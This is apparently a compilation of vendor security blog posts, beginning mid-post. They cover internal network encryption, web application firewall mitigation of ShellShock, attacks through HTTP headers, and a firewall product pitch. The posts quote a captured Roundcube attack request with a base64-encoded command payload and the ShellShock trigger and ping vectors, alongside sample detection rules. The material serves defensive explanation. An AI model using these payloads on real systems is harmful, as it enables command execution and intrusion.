Not only must each device be configured to decrypt and re-encrypt data streams, it must be configured to do so for every application that utilizes encryption on the internal network.
For an organization with only one or two applications this might not be so onerous a task, but for organizations that may be using multiple applications, domains, and thus keys/certificates, the task of deploying all those keys/certificates, configuring each device, and then managing them through the application lifecycle can certainly be a time-consuming process. This isn’t a linear mathematics problem, it’s multiplicative: for every key or certificate added, the cost of managing that information increases by the number of devices that must be in possession of that key/certificate. Ten applications' certificates deployed to a dozen inline devices, for example, means 120 key installations to track, secure, and rotate.

INTERNAL ENCRYPTION CAN HIDE REAL SECURITY ISSUES

The real problem, as evinced by recent breaches of payment card processing vendors like Heartland Systems, is not that data was or was not encrypted on the internal network, but that the systems through which that data was flowing were not secured. Attackers gained access through the systems, the ones we are pretending are secure for the sake of argument. Obviously, pretending they are secure is not a wise course of action. One cannot capture and sniff out unsecured data on an internal network without first being on the internal network. This is a very important point, so let me say it again: one cannot capture and sniff out unsecured data on an internal network without first being on the internal network.

It would seem, then, that the larger issue here is the security of the systems and devices through which sensitive data must travel, and that encryption is really just a means of last resort for data traversing the internal network. Internal encryption is often a band-aid which merely covers up the real problem of insecure systems and poorly implemented security policies. Granted, in many industries internal encryption is a requirement and must be utilized, but those industries also accept and grant IT the understanding that costs will be higher in order to implement such an architecture. The additional costs are built into the business model already. That’s not necessarily true for most organizations, where operational efficiency is now just as high a priority as any other IT initiative.

The implementation of encryption on internal networks can also lead to a false sense of security. It is important to remember that encrypted tainted data is still tainted data; it is merely hidden from security systems, which are passive in nature, unless the network is architected (or re-architected) such that the data is decrypted before being channeled through those solutions. Encryption hides data from prying eyes; it does nothing to ensure the legitimacy of the data. Simply initiating a policy of “all data on all networks must be secured via encryption” does not make an organization more secure, and in fact it may lead to a less secure organization as it becomes more difficult and costly to implement security solutions designed to dig deeper into the data and ensure it is legitimate traffic free of taint or malicious intent.

"Bottom line is everyone with confidential data to protect should enable encryption on all internal networks with access to that data."

The “bottom line” is that everyone with confidential data to protect – which is just about every IT organization out there – needs to understand the ramifications of enabling encryption across the internal network, both technically and from a cost/management perspective. Encryption of data on internal networks is not a bad thing to do at all, but it is also not a panacea.
The benefits of implementing internal encryption need to be weighed against the costs and balanced with risk, not simply tossed blithely over the network like a security blanket.

Related posts:
- PCI Standard or Not, Encrypting Internal Network Traffic is a Good Thing
- The Real Meaning of Cloud Security Revealed
- The Unpossible Task of Eliminating Risk
- Damned if you do, damned if you don't
- The IT Security Flowchart
Mitigating the Unknown

Mitigating “0-day” attacks – so named because the programmer has zero days to fix the flaw – might seem impossible. In practice, however, they can be significantly mitigated. We can buy some time by heavily reducing the “vulnerability window” (the period until the vulnerability is patched or a specific signature is deployed), thus shifting those attacks to be “N-day” attacks.

Once a widely used service has a “0-day” publicly disclosed, massive internet scans for vulnerable servers (also known as “campaigns”) are launched almost immediately. Those scans rely on bots either scanning the whole IP range or searching for potential targets using search engines (known as “Google Dorks”). Being a “0-day” attack, there is no complete protection against it. However, a good assumption is that a certain amount of time will pass before the exploit evolves enough to include variations, deploy evasions, or be customized for a specific target. That’s where a good level of proactive protection is required. A typical “0-day” timeline runs from public disclosure, through mass scanning campaigns, to eventual patching.

A proactive mitigation strategy includes the following ingredients: positive security, proactive negative security, and attack symptom mitigation. Taking the WAF as an example, positive security might consist of whitelisting only the needed meta-characters (while blocking all others), enforcing HTTP compliance, configuring mandatory request headers, and narrowing down HTTP methods and file types. Much more can be whitelisted. Whitelisting the entire application (building a full positive security model) can sometimes be challenging. It is no less important to rely on proactive attack signatures which are not coupled with a specific CVE, but rather focus on generic exploitation and evasion patterns, and on catching the actual post-exploitation payload, regardless of the specific weakness which allowed delivering it in the first place. Due to the automation of the “campaign” process, a crucial mitigation factor during the “vulnerability window” may also be detecting automation attack symptoms: deploying strong bot detection techniques, blocking Tor exit nodes and having a good IP reputation feed.

ShellShock Example

I want to use the latest high-profile “ShellShock” vulnerability (CVE-2014-6271 and friends) to see how we take this theory into practice. Let’s take some of the popular real attack vectors used in this recent attack and see how BIG-IP ASM detected them using the proactive approach, before there was a designated “ShellShock” signature. The attack vectors are a mix taken from Exploit-DB, Metasploit, shellshock.py, the detectify.com portal, and requests recorded by honeypots.

Screenshot: Result of running the vectors against ASM

As we can see, all of those vectors were blocked.

Screenshot: Blocked requests in the ASM event log

Let’s dig in and understand what prevented the exploitation. We can see that the exploit is sent via the “User-Agent” header. It is running “/bin/bash” to download the malware using “wget”, running it using Perl and finally removing the malware file itself.

Screenshot: Exploit in the wild

Screenshot: Signature triggered by an exploit in the wild

Without being aware of the actual weakness, “() { :;};”, which triggers the code execution, the exploit is caught for several reasons. First, we see that it is targeting the “/cgi-bin/bash” location, thus triggering two URI signatures looking for this sensitive URL (200000034 and 200100316).
Second, ASM caught the actual command that performs the server takeover (the “payload”) with a signature that looks for calls to executables in the “/bin” directory (200003058). This is the exact example of proactive signatures which look for the actual “takeover” payload, or the sensitive locations/resources being targeted, rather than focusing only on the exact weakness that opens the door to exploitation. As for positive security, customers who fence themselves off from non-legitimate or very rare characters in headers, such as “[”, “]”, “`”, “{“, “}”, would have prevented even the 0-day attack itself (the “{“ character in the case of ShellShock).

Several other signatures (2000021069 and 200021092) for automated user-agents, “wget” and “perl”, are also triggered, as the payload is delivered through the user-agent header (which is true for most of the "ShellShock" exploits).

Let’s observe another attack vector:

Screenshot: shellshock.py exploit

Screenshot: Signature triggered by shellshock.py

We see the same “/bin” execution signature (200003058); however, we also detect a symptom of suspicious behavior, and a signature for an automated Python client is fired (200021101).

While looking at the exploit published on Exploit-DB and some other vectors in the wild, we see that the only signature that bravely shields against their successful exploitation is the same “/bin” execution signature (200003058). Of course, if there were another command that does not have a corresponding signature (because it is not considered sensitive, most likely causes false positives, or is simply missing), the attack vector could penetrate (as in the case of the “() { :; }; ping x.x.x.x” vector). But that’s where our previously mentioned assumption takes hold. There is a crucial period, during the “vulnerability window”, just before the exploit expands to several variations or evolves to other payloads as well. It is not by accident that we can rely on that single signature to buy us some time before the patch is applied.

Screenshot: Exploit from Exploit-DB

Screenshot: Signature triggered by exploit from “Exploit-DB”

Another proactive measure, directly related to attack symptoms, which can serve as a life belt during the “vulnerability window”, is using ASM’s bot protection features, which incorporate several state-of-the-art techniques to identify automated bots regardless of the payload they are trying to deliver.

Afterword

We are not stating that there is complete protection against previously unknown attacks. However, there is definitely an already existing, proactive set of tools that can significantly lower your chances of compromise in the critical exposed period until the full patch is deployed.
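As a purely illustrative companion to the positive-security point above, the following hypothetical iRule sketch shows how a narrow, temporary guard could be dropped in during a vulnerability window: it scans request header values for the ShellShock trigger sequence and rejects matching requests. The pattern and response are examples only; a real deployment would rely on ASM signatures and policies rather than a hand-rolled rule like this.

when HTTP_REQUEST {
    # Temporary ShellShock guard: look for the "() {" trigger in any header value
    foreach header_name [HTTP::header names] {
        foreach header_value [HTTP::header values $header_name] {
            if { $header_value contains "() {" } {
                log local0. "ShellShock pattern in header $header_name from [IP::client_addr]"
                HTTP::respond 403 content "Request blocked"
                return
            }
        }
    }
}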
I am in your HTTP headers, attacking your application

Zero-day IE exploits and general mass SQL injection attacks often overshadow potentially more dangerous exploits targeting lesser known applications and attack vectors. These exploits are potentially more dangerous because, once proven through a successful attack on these lesser known applications, they can rapidly be adapted to exploit more common web applications, and no one is specifically concentrating on preventing them because they're, well, not so obvious.

Recently, the SANS Internet Storm Center featured a write-up on attempts to exploit Roundcube Webmail via the HTTP Accept header. Such an attack is generally focused on exploitation of operating system, language, or environmental vulnerabilities, as the data contained in HTTP headers (aside from cookies) is rarely used by the application as user input. An example provided by SANS of an attack targeting Roundcube via the HTTP Accept header:

POST /roundcube/bin/html2text.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Host: xx.xx.xx.xx
Accept: ZWNobyAoMzMzMjEyKzQzMjQ1NjY2KS4iICI7O3Bhc3N0aHJ1KCJ1bmFtZSAtYTtpZCIpOw==
Content-Length: 54

What the attackers in this example were attempting to do is trick the application into evaluating system commands encoded in the Accept header in order to retrieve some data they should not have had access to. The purpose of the attack, however, could easily have been for some other nefarious deed, such as potentially writing a file to the system that could be used as a cross-site scripting attack, or deleting files, or just generally wreaking havoc with the system.

This is the problem security professionals and developers face every day: what devious thing could some miscreant attempt to do? What must I protect against? This is part of what makes secure coding so difficult - developers aren't always sure what they should be protecting against, and neither are the security pros, because the bad guys are always coming up with new ways to exploit some aspect of an application or transport layer protocol.

Think HTTP headers aren't generally used by applications? Consider the use of the custom "SOAPAction" HTTP header for SOAP web services, and cookies, and ETags, and ... well, the list goes on. HTTP headers carry data used by applications and therefore should be considered a viable transport mechanism for malicious code.

So while the exploitation of HTTP headers is not nearly as common or rampant as mass SQL injection today, its use to target specific applications means it is a possible attack vector for the future, against which applications should be protected now, before it becomes critical to do so. No, it may never happen. Attackers may never find a way to truly exploit HTTP headers. But then again, they might, and apparently have been trying. Better safe than sorry, I say. Regardless of the technology you use, the process is the same: you need to determine what is allowed in HTTP headers and verify them just as you would any other user-generated input, or you need to invest in a solution that provides this type of security for you. RFC 2616 (HTTP), specifically section 14, provides a great deal of guidance and detail on what is acceptable in an HTTP header field. Never blindly evaluate or execute upon data contained in an HTTP header field. Treat any input, even input that is not traditionally user-generated, as suspect.
That's a good rule of thumb for protecting against malicious payloads anyway, but it's an especially good rule when dealing with what is likely considered a non-traditional attack vector (until it is used, and overused, to the point it's considered typical, of course).

Possible ways to prevent the potential exploitation of HTTP headers:
- Use network-side scripting or mod_rewrite to intercept, examine, and either sanitize or outright reject requests containing suspicious data in HTTP headers (a rough sketch follows after this list).
- Invest in a security solution capable of sanitizing transport (TCP) and application layer (HTTP) protocols and use it to do so.
- Investigate whether an existing solution - either security or application delivery focused - is capable of providing the means through which you can enforce protocol compliance.
- Use secure coding techniques to examine - not evaluate - the data in any HTTP headers you are using and ensure they are legitimate values before using them in any way.

A little proactive security can go a long way toward not being the person who inadvertently discovers a new attack methodology.
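Building on the network-side scripting suggestion above, here is a small, hypothetical iRule sketch of what such header validation could look like on a BIG-IP: it rejects requests whose Accept header does not resemble a legitimate media-type list. The regular expression is intentionally simple and illustrative, not a complete grammar for RFC-compliant Accept values, and real header enforcement is better left to a protocol-aware security solution.

when HTTP_REQUEST {
    set accept_value [string tolower [HTTP::header value "Accept"]]
    if { $accept_value ne "" } {
        # Rough structural check: every comma-separated element should look
        # like a media range such as text/html or */*;q=0.8
        set valid 1
        foreach part [split $accept_value ","] {
            set part [string trim $part]
            if { ![regexp {^[a-z0-9*+.-]+/[a-z0-9*+.-]+(;.*)?$} $part] } {
                set valid 0
                break
            }
        }
        if { !$valid } {
            log local0. "Rejected suspicious Accept header from [IP::client_addr]"
            HTTP::respond 400 content "Bad Request"
            return
        }
    }
}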
F5 Friday: Goodbye Defense in Depth. Hello Defense in Breadth.

#adcfw #infosec F5 is changing the game on security by unifying it at the application and service delivery layer.

Over the past few years we’ve seen firewalls fail repeatedly. We’ve seen business disrupted, security thwarted, and reputations damaged by the failure of the very devices meant to prevent such catastrophes from happening. These failures have been caused by a change in tactics from invaders who no longer seek to find a way through or over the walls, but who simply batter them down instead. A combination of traditional attacks – network-layer – and modern attacks – application-layer – has become a force to be reckoned with; one that traditional stateful firewalls are often not equipped to handle. Encrypted traffic flowing into and out of the data center often bypasses security solutions entirely, leaving another potential source of a breach unaddressed. And performance is being impeded by the increasing number of devices that must “crack the packet”, as it were, and examine it, often duplicating functionality with varying degrees of success. This is problematic because the resolution to this issue can be as disconcerting as the problem itself: disable security. Seriously. Security functions have been disabled, intentionally, in the name of performance.

IT security personnel within large corporations are shutting off critical functionality in security applications to meet network performance demands for business applications.
– SURVEY: SECURITY SACRIFICED FOR NETWORK PERFORMANCE

What the company [NSS Labs] found would likely startle any existing or potential customers: three of the six firewalls failed to stay operational when subjected to stability tests, five out of six didn't handle what is known as the "Sneak ACK attack," that would enable attackers to side-step the firewall itself. Finally, according to NSS Labs, the performance claims presented in the vendor datasheets "are generally grossly overstated."
– Independent lab tests find firewalls fall down on the job

Add in the complexity from the sheer number of devices required to implement all the different layers of security needed, which increases costs while impairing performance, and you’ve got a broken model in need of repair. This is a failure of the defense in depth strategy: the layered, multi-device (silo) approach to operational security. Most importantly, it’s one that’s failing to withstand attacks. What we need is defense in breadth – the height of the stack – to assure availability and security using a more intelligent, unified security strategy.

DEFENSE in BREADTH

While it’s really not as catchy as “defense in depth”, the concept behind the admittedly awkward-sounding phrase is sound: to assure availability and security simultaneously requires a strong security strategy from the bottom to the top of the networking stack, i.e. the application layer. The ability of the F5 BIG-IP platform to provide security up and down the stack has existed for many years, and its capability to detect, prevent, and withstand concerted attacks has been appreciated by its customers (quietly) for some time. While basic firewalling functions have been a part of BIG-IP for years, there are certain capabilities required of a firewall – specifically an ICSA certified firewall – that it didn’t have. So we decided to do something about that. The result is the ICSA certification of the BIG-IP platform as a network firewall.
Combined with its existing ICSA certifications for web application firewall (BIG-IP Application Security Manager) and SSL-TLS VPN 3.0 (BIG-IP Edge Gateway), the BIG-IP platform now supports a full-spectrum security solution in a single, unified system. What is unique about F5’s approach is that the security capabilities noted above can be deployed on BIG-IP Application Delivery Controllers (ADCs) - best known for providing industry-leading intelligent traffic management and optimization capabilities. This firewall solution is part of F5’s comprehensive security architecture that enables customers to apply a unified security strategy. For the first time in the industry, organizations can secure their networks, data, protocols, applications, and users on a single, flexible, and extensible platform: BIG-IP. Combining network firewall services with the ability to plug the hole in modern security implementations (the application layer), all on a platform-based solution, provides the opportunity to consolidate security services and leverage a shared infrastructure platform, resulting in a more comprehensive, strategic deployment that is not only more secure, but more cost-effective.

Resources:
- The Fundamental Problem with Traditional Inbound Protection
- The Ascendancy of the Application Layer Threat
- ICSA Certified Network Firewall for Data Centers
- Mature Security Organizations Align Security with Service Delivery
- BIG-IP Data Center Firewall Solution – SlideShare Presentation
- The New Data Center Firewall Paradigm – White Paper
- Independent lab tests find firewalls fall down on the job
- SURVEY: SECURITY SACRIFICED FOR NETWORK PERFORMANCE
- F5 Friday: When Firewalls Fail…
- Challenging the Firewall Data Center Dogma
- What We Learned from Anonymous: DDoS is now 3DoS
- The Many Faces of DDoS: Variations on a Theme or Two
- F5 Friday: Eliminating the Blind Spot in Your Data Center Security Strategy
- F5 Friday: Multi-Layer Security for Multi-Layer Attacks